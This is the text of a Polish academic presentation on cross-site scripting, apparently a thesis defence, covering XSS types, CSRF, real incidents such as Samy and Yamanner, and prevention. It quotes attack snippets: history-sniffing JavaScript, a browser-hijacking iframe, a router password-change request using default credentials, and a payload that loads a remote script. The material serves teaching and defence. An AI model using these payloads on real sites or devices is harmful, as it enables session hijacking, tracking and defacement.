ATAKI TYPU CROSS-SITE SCRIPTING

Podobne dokumenty
Aplikacje webowe w obliczu ataków internetowych na przykładzie CodeIgniter Framework

Ataki na aplikacje WWW. Łomem, czy wytrychem? Jak dobrać się do aplikacji WWW

OWASP OWASP. The OWASP Foundation Cross-Site Scripting. Ryzyko do zaakceptowania? Warszawa, 27 stycznia 2011 Michał Kurek

Drobne błędy w portalach WWW

Zagrożenia związane z udostępnianiem aplikacji w sieci Internet

Aspekty bezpieczeństwa aplikacji internetowych

Hosting WWW Bezpieczeństwo hostingu WWW. Dr Michał Tanaś (

Bezpieczeństwo systemów komputerowych

Kurs rozszerzony języka Python

Program szkolenia: Bezpieczny kod - podstawy

The OWASP Foundation Session Management. Sławomir Rozbicki.

Tytuł prezentacji. Wykrywanie cyberzagrożeń typu Drive-by Download WIEDZA I TECHNOLOGIA. Piotr Bisialski Security and Data Center Product Manager

Bezpieczeństwo aplikacji internetowych

Bezpieczeństwo portali społecznościowych w ujęciu robaków Web 2.0

Snifery wbudowane w Microsoft Windows

PORADNIKI. Cross-site Scripting

Zarządzanie sesją w aplikacjach Internetowych. Kraków, Paweł Goleń

Bezpieczeństwo portali społecznościowych w ujęciu robaków Web 2.0

Przykład konfiguracji koncentratora SSL VPN w trybie Reverse Proxy (dotyczy serii urządzeń ZyWALL USG)

Ajax a bezpieczeństwo aplikacji webowych. Jakub Wierzgała

Aplikacje WWW. Krzysztof Ciebiera. 3 kwietnia 2014

Bezpieczeństwo frameworków WEBowych Java na przykładzie ataku XSS

Wykorzystanie nowoczesnych technik ataku do zdobycia poufnych danych Bezpieczeństwo systemów sieciowych - Projekt

Polityka prywatności dla strony ELCEN Sp. z o.o. z siedzibą w Gdyni

OCHRONA PRZED RANSOMWARE

Przekierowanie portów w routerze TP-LINK na przykładzie kamery Kenik. Po co wykonujemy przekierowanie portów? Spójrzmy na rysunek

Języki programowania wysokiego poziomu. Forum

Przekierowanie portów w routerze TP-LINK na przykładzie kamery Kenik. Po co wykonujemy przekierowanie portów? Spójrzmy na rysunek poniżej:

Panda Managed Office Protection. Przewodnik. Panda Managed Office Protection. Przewodnik

Przygotowanie do nowoczesnego programowania po stronie przeglądarki. (HTML5, CSS3, JS, wzorce, architektura, narzędzia)

Języki programowania wysokiego poziomu. Blog

Kompresja stron internetowych

ANALIZA BEZPIECZEŃSTWA SIECI MPLS VPN. Łukasz Polak Opiekun: prof. Zbigniew Kotulski

Agenda. Rys historyczny Mobilne systemy operacyjne

Wybrane działy Informatyki Stosowanej

Instrukcja użytkowania platformy ONLINE. Akademii Doskonalenia Zawodowego NATUROPATA ADZ Naturopata

Open(Source) Web Application Security Project

SUM Edukacja Techniczno Informatyczna Języki i Systemy Programowania. Wykład 2. dr Artur Bartoszewski - WYKŁAD: Języki i Systemy Programowania,

Logowanie do systemu SL2014

OCHRONA PRZED RANSOMWARE. Konfiguracja ustawień

Wprowadzenie do kryptografii i bezpieczeństwa. Po raz czwarty

Niektóre typowe cechy wiadomości typu phishing to:

O stronach www, html itp..

Agenda. Quo vadis, security? Artur Maj, Prevenity

Dodawanie nowego abonenta VOIP na serwerze Platan Libra

System kontroli dostępu ACCO NET Instrukcja instalacji

Zagrożenia trywialne. Zagrożenia bezpieczeństwa aplikacji internetowych. Parametry ukryte. Modyfikowanie parametrów wywołania

Laboratorium - Poznawanie FTP

Instrukcja konfiguracji funkcji skanowania

Laboratorium - Używanie programu Wireshark do obserwacji mechanizmu uzgodnienia trójetapowego TCP

Tworzenie stron internetowych z wykorzystaniem HTM5, JavaScript, CSS3 i jquery. Łukasz Bartczuk

LUKI BEZPIECZEŃSTWA W APLIKACJACH INTERNETOWYCH. Waldemar Korłub. Wytwarzanie Aplikacji Internetowych KASK ETI Politechnika Gdańska

Laboratorium - Przechwytywanie i badanie datagramów DNS w programie Wireshark

Zawartość specyfikacji:

Wykorzystywanie plików cookies

Instrukcja obsługi Uczeń. Spis Treści

Analiza skuteczności zabezpieczeń przed atakami na aplikacje Web

Bezpieczeństwo frameworków WEBowych Java na przykładzie ataku CSRF

Opis Przedmiotu Zamówienia na przeprowadzenie testów bezpieczeństwa systemu wspomagania nadzoru archiwalnego e-nadzór

Laboratorium - Konfiguracja ustawień przeglądarki w Windows Vista

Laboratorium nr 4 - Badanie protokołów WWW

Narzędzia OWASP dla developerów OWASP ESAPI & AppSensor OWASP The OWASP Foundation

OWASP. The Open Web Application Security Project. OWASP Top rc1. Dziesięć najbardziej krytycznych zagrożeń w web aplikacjach

Instrukcja korzystania z systemu IPbaza. oraz konfiguracji urządzeń

Tomasz Grześ. Systemy zarządzania treścią, cz. II

Przekierowanie portów w routerze - podstawy

Projektowani Systemów Inf.

Źródła. cript/1.5/reference/ Ruby on Rails: AJAX: ssays/archives/

Specyfikacja techniczna kreacji HTML5

InPro RCP WEB moduł sieciowy do oprogramowania InPro RCP

Proste kody html do szybkiego stosowania.

Zastosowanie darmowych rozwiązań do testów użyteczności aplikacji internetowych

Edytor Edit+ - dodawanie zdjęć i. załączników. Instrukcja użytkownika

Internetowy System Zgłoszeń Postępowanie Kwalifikacyjne w Służbie Cywilnej PRZEWODNIK

pomocą programu WinRar.

POLITYKA PLIKÓW COOKIES

Skrócona instrukcja obsługi rejestratorów marki IPOX

Przewodnik użytkownika (instrukcja) AutoMagicTest Spis treści

3S TeleCloud - Aplikacje Instrukcja użytkowania usługi 3S TELEFON UŻYTKOWNIK

Instrukcja obsługi Pakietu Bezpieczeństwa UPC (ios)

KONFIGURACJA PRZEGLĄDAREK. Poniższa konfiguracja dedykowana jest dla Bankowości Internetowej SGB

Języki programowania wysokiego poziomu. Ćwiczenia

Instrukcja składania wniosku o dofinansowanie w systemie informatycznym IP na potrzeby konkursu nr 1/4.1.4/2015

Instrukcja dla usługi ModeView

Dokumentacja Skryptu Mapy ver.1.1

Języki programowania wysokiego poziomu. PHP cz.3. Formularze

Sieci Komputerowe i Bazy Danych

Podsumowanie. Uwaga. Przygotowanie

Linksys/Cisco SPA2102, SPA3102 Instrukcja Konfiguracji

Polityka prywatności Spółdzielni Mieszkaniowej Słoneczny Stok

Wydział Informatyki, Elektroniki i Telekomunikacji Katedra Telekomunikacji

INSTRUKCJA UŻYTKOWNIKA

Jarosław Kuchta Administrowanie Systemami Komputerowymi. Internetowe Usługi Informacyjne

Laboratorium - Konfiguracja ustawień przeglądarki w Windows 7

Publikowanie strony WWW

CYBEROAM Unified Treatment Management, Next Generation Firewall

Blokowanie stron internetowych

ArcaVir 2008 System Protection

Programowanie komponentowe. Przykład 1 Bezpieczeństwo wg The Java EE 5 Tutorial Autor: Zofia Kruczkiewicz

PRÓBNY EGZAMIN POTWIERDZAJĄCY KWALIFIKACJE W ZAWODZIE CZĘŚĆ PISEMNA

Transkrypt:

ATAKI TYPU CROSS-SITE SCRIPTING Michał Korecki Kierujący pracą: prof. dr hab. inż. Zbigniew Kotulski

PLAN PREZENTACJI 1. Cel pracy i motywacja 2. Co to jest XSS? 3. Praca 4. Przykłady

CEL PRACY I MOTYWACJA Cel: Zdefiniowanie narzędzi służących testowaniu i zabezpieczeo aplikacji internetowych Zapoznanie z metodami przeprowadzania ataków XSS Analiza zagrożeo będących konsekwencją udanego ataku XSS Opracowanie zaleceo i rad zwiększających bezpieczeostwo aplikacji internetowych oraz zwykłych użytkowników Motywacja: Ataki XSS są niedocenianą metodą przeprowadzania ataków Brak poważnej literatury w języku polskim traktującej o XSS

MOTYWACJA

CROSS-SITE SCRIPTING Osadzenie w treści strony kodu (zazwyczaj JavaScript), który wyświetlony innym żytkownikom może doprowadzid do wykonania przez nich niepożądanych akcji. Atak na użytkownika, nie na serwer aplikacji. Serwer jest pośrednikiem. Cross-Site Scripting = XSS Cascading Style Sheets = CSS

JAK TO NAZWAĆ? Unauthorized Site Scripting Unofficial Site Scripting Uniform Resource Locator (URL) Parameter Script Insertion Cross-Site Scripting Synthesized Scripting Fraudulent Scripting fraudulent oszukaoczy, fałszywy, nieuczciwy

TYPY ATAKÓW XSS Non-persistent XSS Persistent XSS DOM-Based XSS Przekierowania CSRF Inne (PDF, CSS, obrazki, omijanie filtrów danych)

NON-PERSISTENT XSS

PERSISTENT XSS

CSRF CROSS SITE REQUEST FORGERY

PRZYKŁADOWE ATAKI Kradzież historii Stałe zalogowanie Atak na intranet Przejęcie przeglądarki Skanowanie wewnętrznej sieci Zdalna zmiana hasła routera w wewnętrznej sieci Wymazywanie strony

KRADZIEŻ HISTORII var websites = [ "http://www.google.pl", http://www.wp.pl ]; var link = document.createelement("a"); link.href = websites[0]; link.innerhtml = websites[0]; document.body.appendchild(link); var color = document.defaultview.getcomputedstyle(link,null).getpropertyvalue("color"); if(color == "rgb(85, 26, 139)") {... }

KRADZIEŻ HISTORII CD

STAŁE ZALOGOWANIE Wykorzystanie konsoli błędów JavaScript <script src= http://mail.google.com/mail/ >

ATAK NA INTRANET Scenariusz: Ofiara odwiedza zainfekowaną stronę lub klika w spreparowany link Ujawnienie wewnętrznego adresu IP ofiary Odkrycie interfejsów maszyn istniejących w sieci Przeprowadzenie dokładnych ataków

ATAK NA INTRANET CD Przejęcie kontroli nad przeglądarką = dostęp do cookies, monitorowanie danych wprowadzanych za pomocą klawiatury, wiedza o odwiedzanych stronach. Zapewnienie ciągłej kontroli nad przeglądarką dzięki odpowiednio przygotowanej ramce iframe.

ATAK NA INTRANET CD var iframe = document.createelement("iframe"); iframe.setattribute("src","/"); iframe.setattribute("id",'watched'); iframe.setattribute("frameborder", "0"); iframe.setattribute("onload","readviewport()"); iframe.setattribute("scrolling","no"); iframe.setattribute("onunload",""); iframe.style.border = '0px'; iframe.style.left = '0px'; iframe.style.top = '0px'; iframe.style.width = (window.innerwidth - 20) + 'px'; iframe.style.height = '2000px'; iframe.style.position = 'absolute'; iframe.style.visibility = 'visible'; iframe.style.zindex = '100000'; document.body.innerhtml = ''; document.body.appendchild(iframe);

ATAK NA INTRANET CD Kolejne kroki: Funkcja przechwytująca każde kliknięcie użytkownika i przesyłająca je dalej Odkrycie odresu IP w sieci wewnętrznej applet Java (http://www.reglos.de/myaddress/myaddress.html) Skanowanie sieci wewnętrznej w poszukiwaniu działających maszyn/serwerów

ATAK NA INTRANET CD Konkretny atak: router wewnętrznej sieci LAN Zazwyczaj 192.168.0.1 lub 192.168.1.1 Login: admin Hasło: password http://admin:password@192.168.1.1 Odpowiednio spreparowane żądanie protokołu HTTP http://admin:password@192.168.1.1/password.cgi?sysoldpasswd=passw ord&sysnewpasswd=newpassword&sysconfirmpasswd=newpassw ord&cfalert_apply=apply

WYMAZYWANIE STRONY Oficjalna strona Marii Szarapowej, kwiecieo 2007 rok http://www.mariasharapova.com/defaultflash.sps?page=//%20-- %3E%3C/script%3E%3Cscript%20src=http://www.securitylab.ru/u pload/story.js%3e%3c/script%3e%3c!--&pagenumber=1 parametr page: // --></script><script src=http://www.securitylab.ru/upload/story.js></script><! Treśd umieszczona zamiast prawdziwej zawartości strony informowała fanów tenisistki, że ta rezygnuje z tenisowej kariery, ponieważ chce zostad ekspertem bezpieczeostwa oraz że poczyniła ku temu pierwsze kroki zdając egzamin CISCO CCIE.

YAMANNER (YAHOO!) Czerwiec 2006 roku Interfejs webowy kont pocztowych Yahoo! Kod umieszczony w treści wiadomości Wystarczyło otwarcie wiadomości Luka w mechanizmie sprawdzającym kod HTML i JS Mechanizm usuwał znaczniki onload i target Infekcja 200 tys. Użytkowników w 2 dni

YAMANNER (YAHOO!) CD Wprowadzony kod: <img src='http://us.i1.yimg.com/us.yimg.com/i/us/nt/ma/ma_mail_1.gif' target=""onload="// złośliwy kod //"> Wynik: <img src='http://us.i1.yimg.com/us.yimg.com/i/us/nt/ma/ma_mail_1.gif' onload="// złośliwy kod //">

SAMY IS MY HERO (MYSPACE) 4 października 2005 roku Rozprzestrzeniał się infekując profile użytkowników Wysłanie zaproszenia do autora Dodanie wpisu na profilu: but most of all, samy is my hero Każda osoba oglądająca profil stawała się ofiarą Infekcja ponad miliona użytkowników DoS

YOUTUBE (JUSTIN BIEBER) Kod w komentarzach Informacja o śmierci artysty Przekierowanie na strony pornograficzne Zablokowanie wyświetlania komentarzy po 2h

YOUTUBE (JUSTIN BIEBER) CD

ZAPOBIEGANIE ATAKOM Filtrowanie danych pochodzących od użytkownika Kod HTML dostarczany przez użytkownika Bezpieczeostwo przeglądarki internetowej Podejrzane strony WWW Poczta elektroniczna Długie i krótkie adresy URL

ADRESY I PRZEKIEROWANIA Krótkie: http://tinyurl.com/2ehb86b Długie: data:text/javascript;charset=utf- 8,%2F%2F%20Hello%20XSS%0A%2F%2F%0A%2F%2F%20%3D%3DUser Script%3D%3D%0A%2F%2F%20%40name%20Hello%20XSS%0A%2F%2 F%20%40description%20Skrypt%20zmienia%20zawartosc%20element ow%20%3ch1%3e%0a%2f%2f%20%40include%20http%3a%2f%2f*% 0A%2F%2F%20%40exclude%20http%3A%2F%2Flocalhost%2F*%0A%2F %2F%20%40exclude%20http%3A%2F%2F127.0.0.1%2F*%0A%2F%2F% 20%3D%3D%2FUserScript%3D%3D%0Avar%20h1array%20%3D%20doc ument.getelementsbytagname('h1')%3b%0afor%20(var%20i%20%3d %200%3B%20i%20%3C%20h1array.length%3B%20i%2B%2B)%0Ah1arr ay%5b0%5d.innerhtml%20%3d%20'hello%20xss'%3b%0a//.user.js Top 10: Things Only Men Can Do 98% Of people Can t STOP LAUGHING at this Video!!

DZIĘKUJĘ

2025 © DocPlayer.pl Polityka prywatności | Warunki świadczenia usług | Zwrotny adres